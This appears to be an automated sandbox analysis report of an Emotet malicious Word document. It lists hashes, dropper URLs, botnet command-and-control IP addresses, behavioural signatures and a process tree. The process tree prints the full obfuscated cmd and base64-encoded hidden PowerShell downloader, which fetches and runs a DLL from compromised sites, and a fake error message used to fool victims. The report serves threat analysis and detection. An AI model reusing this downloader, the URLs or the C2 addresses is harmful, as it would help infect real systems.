emotet | 47b5048b9811c07120b3d72a7c46281cd98f12d807cbc75b70bf1d18925c6cc2

Analysis

max time kernel
151s
max time network
152s
platform
windows7_x64
resource
win7v20201028
submitted
25-01-2021 11:28

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

E2-20210125_0942.doc
Size

172KB
MD5

0ccb4f75ef19e618d216816a5282bd09
SHA1

7028d7080ce78804176cd1a14b3ceed1c9c374cc
SHA256

47b5048b9811c07120b3d72a7c46281cd98f12d807cbc75b70bf1d18925c6cc2
SHA512

c5a8d46a5cdc956309882075cdd292a7388ee08520e62fb0633a17a9a0d62f67782f0dd4218bd941920e00873014de2f635b0ed9df97db913edb54d4f29aba95

Score

10^/10

emotet epoch2 banker ransomware trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://www.escalierconsulting.com/wp-includes/I/

exe.dropper

http://aecotimes.com/wp-admin/44Z/

exe.dropper

http://rakikuma.com/cgi-bin/K/

exe.dropper

http://de.letscompareonline.com/cgi-bin/ztEE/

exe.dropper

http://haumaguerraevoceoalvo.com.br/wp-includes/0Hm/

exe.dropper

http://paulomarciotrp.com/z/y/

exe.dropper

https://njyp.com/wp-content/Nz/1/

Extracted

Family

emotet

Botnet

Epoch2

69.38.130.14:80

195.159.28.230:8080

162.241.204.233:8080

181.165.68.127:80

49.205.182.134:80

190.251.200.206:80

139.59.60.244:8080

119.59.116.21:8080

89.216.122.92:80

185.94.252.104:443

70.92.118.112:80

78.24.219.147:8080

173.70.61.180:80

87.106.139.101:8080

66.57.108.14:443

24.179.13.119:80

121.124.124.40:7080

61.19.246.238:443

200.116.145.225:443

93.146.48.84:80

rsa_pubkey.plain

Signatures

Emotet
Emotet is a trojan that is primarily spread through spam emails.
trojan banker emotet
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.

Processes:

cmd.exe

description pid pid_target process target process

Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1768 1720 cmd.exe
Blocklisted process makes network request 4 IoCs

Processes:

powershell.exerundll32.exe

flow pid process

6 1544 powershell.exe
8 1388 rundll32.exe
9 1388 rundll32.exe
10 1388 rundll32.exe
Loads dropped DLL 8 IoCs

Processes:

rundll32.exerundll32.exe

pid process

1380 rundll32.exe
1380 rundll32.exe
1380 rundll32.exe
1380 rundll32.exe
1028 rundll32.exe
1028 rundll32.exe
1028 rundll32.exe
1028 rundll32.exe

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1768	1720	cmd.exe

flow	pid	process
6	1544	powershell.exe
8	1388	rundll32.exe
9	1388	rundll32.exe
10	1388	rundll32.exe

pid	process
1380	rundll32.exe
1380	rundll32.exe
1380	rundll32.exe
1380	rundll32.exe
1028	rundll32.exe
1028	rundll32.exe
1028	rundll32.exe
1028	rundll32.exe

Drops file in System32 directory 2 IoCs

Processes:

powershell.exerundll32.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\Zplopiuapfzhl\lkscxpzmtrqw.phu	rundll32.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
ransomware

System Information Discovery
T1082
Drops file in Windows directory 1 IoCs

Processes:

WINWORD.EXE

description ioc process

File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE
Office loads VBA resources, possible macro or embedded object present

description	ioc	process
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	WINWORD.EXE

Modifies Internet Explorer settings 1 TTPs 9 IoCs

adware spyware

Modify Registry

T1112

Processes:

WINWORD.EXE

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel	WINWORD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Toolbar	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"	WINWORD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

WINWORD.EXE

pid process

1864 WINWORD.EXE
Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

powershell.exerundll32.exe

pid process

1544 powershell.exe
1544 powershell.exe
1388 rundll32.exe
1388 rundll32.exe
1388 rundll32.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 1544 powershell.exe
Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

WINWORD.EXE

pid process

1864 WINWORD.EXE
1864 WINWORD.EXE

pid	process
1864	WINWORD.EXE

pid	process
1544	powershell.exe
1544	powershell.exe
1388	rundll32.exe
1388	rundll32.exe
1388	rundll32.exe

description	pid	process
Token: SeDebugPrivilege	1544	powershell.exe

pid	process
1864	WINWORD.EXE
1864	WINWORD.EXE

Suspicious use of WriteProcessMemory 37 IoCs

Processes:

cmd.exepowershell.exerundll32.exerundll32.exerundll32.exerundll32.exe

description	pid	process	target process
PID 1768 wrote to memory of 608	1768	cmd.exe	msg.exe
PID 1768 wrote to memory of 608	1768	cmd.exe	msg.exe
PID 1768 wrote to memory of 608	1768	cmd.exe	msg.exe
PID 1768 wrote to memory of 1544	1768	cmd.exe	powershell.exe
PID 1768 wrote to memory of 1544	1768	cmd.exe	powershell.exe
PID 1768 wrote to memory of 1544	1768	cmd.exe	powershell.exe
PID 1544 wrote to memory of 1496	1544	powershell.exe	rundll32.exe
PID 1544 wrote to memory of 1496	1544	powershell.exe	rundll32.exe
PID 1544 wrote to memory of 1496	1544	powershell.exe	rundll32.exe
PID 1496 wrote to memory of 1380	1496	rundll32.exe	rundll32.exe
PID 1496 wrote to memory of 1380	1496	rundll32.exe	rundll32.exe
PID 1496 wrote to memory of 1380	1496	rundll32.exe	rundll32.exe
PID 1496 wrote to memory of 1380	1496	rundll32.exe	rundll32.exe
PID 1496 wrote to memory of 1380	1496	rundll32.exe	rundll32.exe
PID 1496 wrote to memory of 1380	1496	rundll32.exe	rundll32.exe
PID 1496 wrote to memory of 1380	1496	rundll32.exe	rundll32.exe
PID 1380 wrote to memory of 1028	1380	rundll32.exe	rundll32.exe
PID 1380 wrote to memory of 1028	1380	rundll32.exe	rundll32.exe
PID 1380 wrote to memory of 1028	1380	rundll32.exe	rundll32.exe
PID 1380 wrote to memory of 1028	1380	rundll32.exe	rundll32.exe
PID 1380 wrote to memory of 1028	1380	rundll32.exe	rundll32.exe
PID 1380 wrote to memory of 1028	1380	rundll32.exe	rundll32.exe
PID 1380 wrote to memory of 1028	1380	rundll32.exe	rundll32.exe
PID 1028 wrote to memory of 544	1028	rundll32.exe	rundll32.exe
PID 1028 wrote to memory of 544	1028	rundll32.exe	rundll32.exe
PID 1028 wrote to memory of 544	1028	rundll32.exe	rundll32.exe
PID 1028 wrote to memory of 544	1028	rundll32.exe	rundll32.exe
PID 1028 wrote to memory of 544	1028	rundll32.exe	rundll32.exe
PID 1028 wrote to memory of 544	1028	rundll32.exe	rundll32.exe
PID 1028 wrote to memory of 544	1028	rundll32.exe	rundll32.exe
PID 544 wrote to memory of 1388	544	rundll32.exe	rundll32.exe
PID 544 wrote to memory of 1388	544	rundll32.exe	rundll32.exe
PID 544 wrote to memory of 1388	544	rundll32.exe	rundll32.exe
PID 544 wrote to memory of 1388	544	rundll32.exe	rundll32.exe
PID 544 wrote to memory of 1388	544	rundll32.exe	rundll32.exe
PID 544 wrote to memory of 1388	544	rundll32.exe	rundll32.exe
PID 544 wrote to memory of 1388	544	rundll32.exe	rundll32.exe

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\E2-20210125_0942.doc"
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:1864

C:\Windows\system32\cmd.exe
cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc UwBFAFQALQBpAFQAZQBtACAAIABWAGEAcgBJAEEAQgBMAEUAOgBoADMANABaADUAOAAgACgAIABbAHQAWQBQAEUAXQAoACIAewAyAH0AewA0AH0AewAzAH0AewAxAH0AewAwAH0AIgAgAC0AZgAgACcAWQAnACwAJwBjAFQATwByACcALAAnAFMAeQBzACcALAAnAC4ASQBPAC4AZABJAFIARQAnACwAJwBUAGUAbQAnACkAIAAgACkAIAAgADsAIAAgACAAIABzAGUAdAAtAGkAVABlAG0AIAAoACIAdgBBAFIAIgArACIASQBhAEIAbABFADoAIgArACIAOABuAFkAbQAiACsAIgBEAFQAIgApACAAKABbAHQAeQBQAEUAXQAoACIAewAwAH0AewAzAH0AewAxAH0AewAyAH0AewA0AH0AIgAtAGYAJwBzAHkAUwBUAGUAbQAuAE4AZQBUAC4AJwAsACcARQByAFYAaQBjAEUAcABPAGkAbgB0AG0AYQBuAEEAZwAnACwAJwBlACcALAAnAFMAJwAsACcAUgAnACkAIAApADsAIAAgACQASABsAHIAdQBfAHEAMAA9ACQAQgA5ADAATQAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQASQA4ADAAUgA7ACQASgAzADQATgA9ACgAJwBGACcAKwAoACcANAAnACsAJwAxAFgAJwApACkAOwAgACQAaAAzADQAWgA1ADgAOgA6ACIAYwBgAFIARQBBAFQAZQBgAGQAaQByAEUAYABjAFQAbwByAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwBUACcAKwAoACcAawA3ACcAKwAnAE0ANgA0ACcAKQArACgAJwBwAGMAJwArACcAZABtACcAKwAnAFQAawA3AFEAagAnACkAKwAoACcAYQBiAHEAJwArACcAYgAnACkAKwAoACcAbQBUACcAKwAnAGsAJwApACsAJwA3ACcAKQAuACIAUgBlAGAAUABMAGAAQQBjAEUAIgAoACgAJwBUAGsAJwArACcANwAnACkALAAnAFwAJwApACkAKQA7ACQATwAwADUARgA9ACgAJwBYADEAJwArACcAOABMACcAKQA7ACAAIAAoACAAIABHAGMASQAgACgAIgB2AEEAUgAiACsAIgBpAEEAQgBMAEUAOgAiACsAIgA4AG4AWQBtACIAKwAiAGQAdAAiACkAKQAuAFYAQQBMAFUARQA6ADoAIgBTAGUAYABjAHUAUgBgAEkAVAB5AHAAYABSAG8AYABUAG8AYABjAG8AbAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzADEAJwApACsAJwAyACcAKQA7ACQAWgAzAF8ASwA9ACgAKAAnAEUAJwArACcANwA2ACcAKQArACcAVAAnACkAOwAkAFIAbAB4AG8AdQBtAGoAIAA9ACAAKAAoACcARQAwACcAKwAnADkAJwApACsAJwBPACcAKQA7ACQAQwA3ADIAUgA9ACgAKAAnAFMAJwArACcANQAyACcAKQArACcAUAAnACkAOwAkAEkAagAwAHgAdAAzAGQAPQAkAEgATwBNAEUAKwAoACgAKAAnADIAQgBVACcAKwAnAE0ANgA0ACcAKwAnAHAAJwApACsAKAAnAGMAZAAnACsAJwBtADIAQgBVAFEAJwArACcAagBhACcAKwAnAGIAcQBiAG0AJwApACsAJwAyACcAKwAnAEIAVQAnACkAIAAtAHIARQBwAGwAYQBDAEUAKABbAEMAaABhAFIAXQA1ADAAKwBbAEMAaABhAFIAXQA2ADYAKwBbAEMAaABhAFIAXQA4ADUAKQAsAFsAQwBoAGEAUgBdADkAMgApACsAJABSAGwAeABvAHUAbQBqACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABGADUAOABYAD0AKAAnAEYAXwAnACsAJwA1AEUAJwApADsAJABIADgANQAyADgAcQB1AD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQAUwAyADQAeQBtAGMAcAA9ACgAKAAnAG4AcwAnACsAJwAgACcAKwAnAHcAdQAgAGQAYgAgACcAKQArACgAJwBuAGQAOgAvAC8AdwB3AHcAJwArACcALgAnACkAKwAoACcAZQAnACsAJwBzAGMAYQBsAGkAZQByACcAKQArACgAJwBjAG8AJwArACcAbgBzAHUAbAB0ACcAKQArACgAJwBpAG4AJwArACcAZwAuACcAKQArACgAJwBjACcAKwAnAG8AbQAnACkAKwAoACcALwB3AHAALQBpAG4AYwBsAHUAZABlAHMALwAnACsAJwBJAC8AIQAnACsAJwBuAHMAIAAnACsAJwB3ACcAKQArACgAJwB1ACAAZAAnACsAJwBiACcAKQArACcAIAAnACsAKAAnAG4AZAA6AC8AJwArACcALwAnACsAJwBhACcAKwAnAGUAYwBvACcAKwAnAHQAaQBtAGUAcwAuACcAKQArACcAYwAnACsAJwBvACcAKwAoACcAbQAnACsAJwAvACcAKwAnAHcAcAAtAGEAZABtACcAKQArACgAJwBpAG4AJwArACcALwAnACkAKwAoACcANAA0AFoAJwArACcALwAnACkAKwAoACcAIQBuACcAKwAnAHMAIAB3ACcAKwAnAHUAIABkACcAKwAnAGIAIAAnACsAJwBuAGQAOgAvACcAKQArACcALwByACcAKwAoACcAYQAnACsAJwBrAGkAJwApACsAJwBrAHUAJwArACgAJwBtAGEALgBjACcAKwAnAG8AbQAvACcAKwAnAGMAZwAnACkAKwAoACcAaQAtAGIAaQAnACsAJwBuAC8ASwAnACkAKwAnAC8AIQAnACsAKAAnAG4AcwAgACcAKwAnAHcAdQAnACsAJwAgAGQAYgAnACsAJwAgACcAKQArACcAbgBkACcAKwAoACcAOgAvACcAKwAnAC8AZAAnACkAKwAnAGUAJwArACgAJwAuAGwAZQB0AHMAJwArACcAYwAnACkAKwAoACcAbwBtACcAKwAnAHAAYQAnACkAKwAoACcAcgBlACcAKwAnAG8AbgBsACcAKQArACgAJwBpACcAKwAnAG4AZQAnACkAKwAoACcALgBjAG8AbQAvACcAKwAnAGMAZwAnACsAJwBpAC0AJwApACsAKAAnAGIAaQBuAC8AJwArACcAegAnACsAJwB0AEUAJwApACsAKAAnAEUALwAhAG4AcwAnACsAJwAgAHcAJwApACsAKAAnAHUAJwArACcAIABkAGIAIABuAGQAJwApACsAJwA6ACcAKwAnAC8AJwArACgAJwAvACcAKwAnAGgAYQB1ACcAKQArACgAJwBtACcAKwAnAGEAZwAnACkAKwAoACcAdQBlAHIAJwArACcAcgBhAGUAdgBvAGMAJwApACsAKAAnAGUAbwBhAGwAJwArACcAdgAnACkAKwAoACcAbwAuACcAKwAnAGMAbwBtACcAKQArACgAJwAuAGIAJwArACcAcgAvAHcAcAAtAGkAJwApACsAKAAnAG4AYwBsAHUAJwArACcAZAAnACkAKwAoACcAZQBzACcAKwAnAC8AMAAnACkAKwAoACcASAAnACsAJwBtAC8AIQBuACcAKQArACgAJwBzACAAJwArACcAdwB1ACcAKQArACcAIAAnACsAJwBkAGIAJwArACgAJwAgAG4AJwArACcAZAA6AC8AJwArACcALwBwAGEAdQAnACkAKwAoACcAbABvAG0AJwArACcAYQAnACkAKwAoACcAcgBjAGkAbwB0AHIAJwArACcAcAAuAGMAJwArACcAbwAnACsAJwBtAC8AegAvAHkAJwArACcALwAnACkAKwAnACEAbgAnACsAKAAnAHMAIAB3AHUAIAAnACsAJwBkAGIAIABuACcAKQArACcAZAAnACsAKAAnAHMAJwArACcAOgAvACcAKQArACgAJwAvAG4AagB5AHAAJwArACcALgBjACcAKwAnAG8AbQAvAHcAcAAnACsAJwAtAGMAbwBuACcAKwAnAHQAJwArACcAZQBuAHQAJwApACsAKAAnAC8AJwArACcATgB6AC8AMQAvACcAKQApAC4AIgByAGUAUABsAGAAQQBgAEMARQAiACgAKAAnAG4AJwArACcAcwAnACsAKAAnACAAJwArACcAdwAnACsAJwB1ACAAZABiACcAKQArACgAJwAgAG4AJwArACcAZAAnACkAKQAsACgAWwBhAHIAcgBhAHkAXQAoACcAbgBqACcALAAnAHQAcgAnACkALAAnAHkAagAnACwAJwBzAGMAJwAsACQASAA4ADUAMgA4AHEAdQAsACcAdwBkACcAKQBbADMAXQApAC4AIgBTAGAAcABsAGkAVAAiACgAJABEADMAMABBACAAKwAgACQASABsAHIAdQBfAHEAMAAgACsAIAAkAFAAMAA0AFMAKQA7ACQAUQAxADAATQA9ACgAJwBIAF8AJwArACcAMQBRACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQASwBrAGoAZgBwAHkAYgAgAGkAbgAgACQAUwAyADQAeQBtAGMAcAApAHsAdAByAHkAewAoAC4AKAAnAE4AZQB3AC0ATwAnACsAJwBiAGoAZQAnACsAJwBjAHQAJwApACAAUwB5AFMAdABlAE0ALgBuAEUAVAAuAFcARQBiAGMAbABpAEUAbgBUACkALgAiAEQAbwBXAGAATgBsAG8AQQBEAGAARgBJAGAAbABlACIAKAAkAEsAawBqAGYAcAB5AGIALAAgACQASQBqADAAeAB0ADMAZAApADsAJABQADEANABXAD0AKAAnAFQAJwArACgAJwAwACcAKwAnADcAVwAnACkAKQA7AEkAZgAgACgAKAAuACgAJwBHACcAKwAnAGUAdAAtAEkAJwArACcAdABlAG0AJwApACAAJABJAGoAMAB4AHQAMwBkACkALgAiAGwAYABFAE4ARwBgAFQASAAiACAALQBnAGUAIAA0ADgAOQA5ADYAKQAgAHsALgAoACcAcgAnACsAJwB1ACcAKwAnAG4AZABsAGwAMwAyACcAKQAgACQASQBqADAAeAB0ADMAZAAsACgAJwBBACcAKwAnAG4AJwArACgAJwB5AFMAdAAnACsAJwByACcAKQArACgAJwBpACcAKwAnAG4AZwAnACkAKQAuACIAVABvAGAAcwBUAGAAUgBJAG4AZwAiACgAKQA7ACQATAA3ADEAUAA9ACgAJwBTACcAKwAoACcAMgAnACsAJwAzAEYAJwApACkAOwBiAHIAZQBhAGsAOwAkAEQANQAxAFcAPQAoACcAUAAzACcAKwAnADUAUQAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFoAMAA0AFkAPQAoACgAJwBYADEAJwArACcAOAAnACkAKwAnAFIAJwApAA==
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1768
- C:\Windows\system32\msg.exe
  msg Admin /v Word experienced an error trying to open the file.
  2⤵
  PID:608
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -w hidden -enc UwBFAFQALQBpAFQAZQBtACAAIABWAGEAcgBJAEEAQgBMAEUAOgBoADMANABaADUAOAAgACgAIABbAHQAWQBQAEUAXQAoACIAewAyAH0AewA0AH0AewAzAH0AewAxAH0AewAwAH0AIgAgAC0AZgAgACcAWQAnACwAJwBjAFQATwByACcALAAnAFMAeQBzACcALAAnAC4ASQBPAC4AZABJAFIARQAnACwAJwBUAGUAbQAnACkAIAAgACkAIAAgADsAIAAgACAAIABzAGUAdAAtAGkAVABlAG0AIAAoACIAdgBBAFIAIgArACIASQBhAEIAbABFADoAIgArACIAOABuAFkAbQAiACsAIgBEAFQAIgApACAAKABbAHQAeQBQAEUAXQAoACIAewAwAH0AewAzAH0AewAxAH0AewAyAH0AewA0AH0AIgAtAGYAJwBzAHkAUwBUAGUAbQAuAE4AZQBUAC4AJwAsACcARQByAFYAaQBjAEUAcABPAGkAbgB0AG0AYQBuAEEAZwAnACwAJwBlACcALAAnAFMAJwAsACcAUgAnACkAIAApADsAIAAgACQASABsAHIAdQBfAHEAMAA9ACQAQgA5ADAATQAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQASQA4ADAAUgA7ACQASgAzADQATgA9ACgAJwBGACcAKwAoACcANAAnACsAJwAxAFgAJwApACkAOwAgACQAaAAzADQAWgA1ADgAOgA6ACIAYwBgAFIARQBBAFQAZQBgAGQAaQByAEUAYABjAFQAbwByAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwBUACcAKwAoACcAawA3ACcAKwAnAE0ANgA0ACcAKQArACgAJwBwAGMAJwArACcAZABtACcAKwAnAFQAawA3AFEAagAnACkAKwAoACcAYQBiAHEAJwArACcAYgAnACkAKwAoACcAbQBUACcAKwAnAGsAJwApACsAJwA3ACcAKQAuACIAUgBlAGAAUABMAGAAQQBjAEUAIgAoACgAJwBUAGsAJwArACcANwAnACkALAAnAFwAJwApACkAKQA7ACQATwAwADUARgA9ACgAJwBYADEAJwArACcAOABMACcAKQA7ACAAIAAoACAAIABHAGMASQAgACgAIgB2AEEAUgAiACsAIgBpAEEAQgBMAEUAOgAiACsAIgA4AG4AWQBtACIAKwAiAGQAdAAiACkAKQAuAFYAQQBMAFUARQA6ADoAIgBTAGUAYABjAHUAUgBgAEkAVAB5AHAAYABSAG8AYABUAG8AYABjAG8AbAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzADEAJwApACsAJwAyACcAKQA7ACQAWgAzAF8ASwA9ACgAKAAnAEUAJwArACcANwA2ACcAKQArACcAVAAnACkAOwAkAFIAbAB4AG8AdQBtAGoAIAA9ACAAKAAoACcARQAwACcAKwAnADkAJwApACsAJwBPACcAKQA7ACQAQwA3ADIAUgA9ACgAKAAnAFMAJwArACcANQAyACcAKQArACcAUAAnACkAOwAkAEkAagAwAHgAdAAzAGQAPQAkAEgATwBNAEUAKwAoACgAKAAnADIAQgBVACcAKwAnAE0ANgA0ACcAKwAnAHAAJwApACsAKAAnAGMAZAAnACsAJwBtADIAQgBVAFEAJwArACcAagBhACcAKwAnAGIAcQBiAG0AJwApACsAJwAyACcAKwAnAEIAVQAnACkAIAAtAHIARQBwAGwAYQBDAEUAKABbAEMAaABhAFIAXQA1ADAAKwBbAEMAaABhAFIAXQA2ADYAKwBbAEMAaABhAFIAXQA4ADUAKQAsAFsAQwBoAGEAUgBdADkAMgApACsAJABSAGwAeABvAHUAbQBqACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABGADUAOABYAD0AKAAnAEYAXwAnACsAJwA1AEUAJwApADsAJABIADgANQAyADgAcQB1AD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQAUwAyADQAeQBtAGMAcAA9ACgAKAAnAG4AcwAnACsAJwAgACcAKwAnAHcAdQAgAGQAYgAgACcAKQArACgAJwBuAGQAOgAvAC8AdwB3AHcAJwArACcALgAnACkAKwAoACcAZQAnACsAJwBzAGMAYQBsAGkAZQByACcAKQArACgAJwBjAG8AJwArACcAbgBzAHUAbAB0ACcAKQArACgAJwBpAG4AJwArACcAZwAuACcAKQArACgAJwBjACcAKwAnAG8AbQAnACkAKwAoACcALwB3AHAALQBpAG4AYwBsAHUAZABlAHMALwAnACsAJwBJAC8AIQAnACsAJwBuAHMAIAAnACsAJwB3ACcAKQArACgAJwB1ACAAZAAnACsAJwBiACcAKQArACcAIAAnACsAKAAnAG4AZAA6AC8AJwArACcALwAnACsAJwBhACcAKwAnAGUAYwBvACcAKwAnAHQAaQBtAGUAcwAuACcAKQArACcAYwAnACsAJwBvACcAKwAoACcAbQAnACsAJwAvACcAKwAnAHcAcAAtAGEAZABtACcAKQArACgAJwBpAG4AJwArACcALwAnACkAKwAoACcANAA0AFoAJwArACcALwAnACkAKwAoACcAIQBuACcAKwAnAHMAIAB3ACcAKwAnAHUAIABkACcAKwAnAGIAIAAnACsAJwBuAGQAOgAvACcAKQArACcALwByACcAKwAoACcAYQAnACsAJwBrAGkAJwApACsAJwBrAHUAJwArACgAJwBtAGEALgBjACcAKwAnAG8AbQAvACcAKwAnAGMAZwAnACkAKwAoACcAaQAtAGIAaQAnACsAJwBuAC8ASwAnACkAKwAnAC8AIQAnACsAKAAnAG4AcwAgACcAKwAnAHcAdQAnACsAJwAgAGQAYgAnACsAJwAgACcAKQArACcAbgBkACcAKwAoACcAOgAvACcAKwAnAC8AZAAnACkAKwAnAGUAJwArACgAJwAuAGwAZQB0AHMAJwArACcAYwAnACkAKwAoACcAbwBtACcAKwAnAHAAYQAnACkAKwAoACcAcgBlACcAKwAnAG8AbgBsACcAKQArACgAJwBpACcAKwAnAG4AZQAnACkAKwAoACcALgBjAG8AbQAvACcAKwAnAGMAZwAnACsAJwBpAC0AJwApACsAKAAnAGIAaQBuAC8AJwArACcAegAnACsAJwB0AEUAJwApACsAKAAnAEUALwAhAG4AcwAnACsAJwAgAHcAJwApACsAKAAnAHUAJwArACcAIABkAGIAIABuAGQAJwApACsAJwA6ACcAKwAnAC8AJwArACgAJwAvACcAKwAnAGgAYQB1ACcAKQArACgAJwBtACcAKwAnAGEAZwAnACkAKwAoACcAdQBlAHIAJwArACcAcgBhAGUAdgBvAGMAJwApACsAKAAnAGUAbwBhAGwAJwArACcAdgAnACkAKwAoACcAbwAuACcAKwAnAGMAbwBtACcAKQArACgAJwAuAGIAJwArACcAcgAvAHcAcAAtAGkAJwApACsAKAAnAG4AYwBsAHUAJwArACcAZAAnACkAKwAoACcAZQBzACcAKwAnAC8AMAAnACkAKwAoACcASAAnACsAJwBtAC8AIQBuACcAKQArACgAJwBzACAAJwArACcAdwB1ACcAKQArACcAIAAnACsAJwBkAGIAJwArACgAJwAgAG4AJwArACcAZAA6AC8AJwArACcALwBwAGEAdQAnACkAKwAoACcAbABvAG0AJwArACcAYQAnACkAKwAoACcAcgBjAGkAbwB0AHIAJwArACcAcAAuAGMAJwArACcAbwAnACsAJwBtAC8AegAvAHkAJwArACcALwAnACkAKwAnACEAbgAnACsAKAAnAHMAIAB3AHUAIAAnACsAJwBkAGIAIABuACcAKQArACcAZAAnACsAKAAnAHMAJwArACcAOgAvACcAKQArACgAJwAvAG4AagB5AHAAJwArACcALgBjACcAKwAnAG8AbQAvAHcAcAAnACsAJwAtAGMAbwBuACcAKwAnAHQAJwArACcAZQBuAHQAJwApACsAKAAnAC8AJwArACcATgB6AC8AMQAvACcAKQApAC4AIgByAGUAUABsAGAAQQBgAEMARQAiACgAKAAnAG4AJwArACcAcwAnACsAKAAnACAAJwArACcAdwAnACsAJwB1ACAAZABiACcAKQArACgAJwAgAG4AJwArACcAZAAnACkAKQAsACgAWwBhAHIAcgBhAHkAXQAoACcAbgBqACcALAAnAHQAcgAnACkALAAnAHkAagAnACwAJwBzAGMAJwAsACQASAA4ADUAMgA4AHEAdQAsACcAdwBkACcAKQBbADMAXQApAC4AIgBTAGAAcABsAGkAVAAiACgAJABEADMAMABBACAAKwAgACQASABsAHIAdQBfAHEAMAAgACsAIAAkAFAAMAA0AFMAKQA7ACQAUQAxADAATQA9ACgAJwBIAF8AJwArACcAMQBRACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQASwBrAGoAZgBwAHkAYgAgAGkAbgAgACQAUwAyADQAeQBtAGMAcAApAHsAdAByAHkAewAoAC4AKAAnAE4AZQB3AC0ATwAnACsAJwBiAGoAZQAnACsAJwBjAHQAJwApACAAUwB5AFMAdABlAE0ALgBuAEUAVAAuAFcARQBiAGMAbABpAEUAbgBUACkALgAiAEQAbwBXAGAATgBsAG8AQQBEAGAARgBJAGAAbABlACIAKAAkAEsAawBqAGYAcAB5AGIALAAgACQASQBqADAAeAB0ADMAZAApADsAJABQADEANABXAD0AKAAnAFQAJwArACgAJwAwACcAKwAnADcAVwAnACkAKQA7AEkAZgAgACgAKAAuACgAJwBHACcAKwAnAGUAdAAtAEkAJwArACcAdABlAG0AJwApACAAJABJAGoAMAB4AHQAMwBkACkALgAiAGwAYABFAE4ARwBgAFQASAAiACAALQBnAGUAIAA0ADgAOQA5ADYAKQAgAHsALgAoACcAcgAnACsAJwB1ACcAKwAnAG4AZABsAGwAMwAyACcAKQAgACQASQBqADAAeAB0ADMAZAAsACgAJwBBACcAKwAnAG4AJwArACgAJwB5AFMAdAAnACsAJwByACcAKQArACgAJwBpACcAKwAnAG4AZwAnACkAKQAuACIAVABvAGAAcwBUAGAAUgBJAG4AZwAiACgAKQA7ACQATAA3ADEAUAA9ACgAJwBTACcAKwAoACcAMgAnACsAJwAzAEYAJwApACkAOwBiAHIAZQBhAGsAOwAkAEQANQAxAFcAPQAoACcAUAAzACcAKwAnADUAUQAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFoAMAA0AFkAPQAoACgAJwBYADEAJwArACcAOAAnACkAKwAnAFIAJwApAA==
  2⤵
  - Blocklisted process makes network request
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
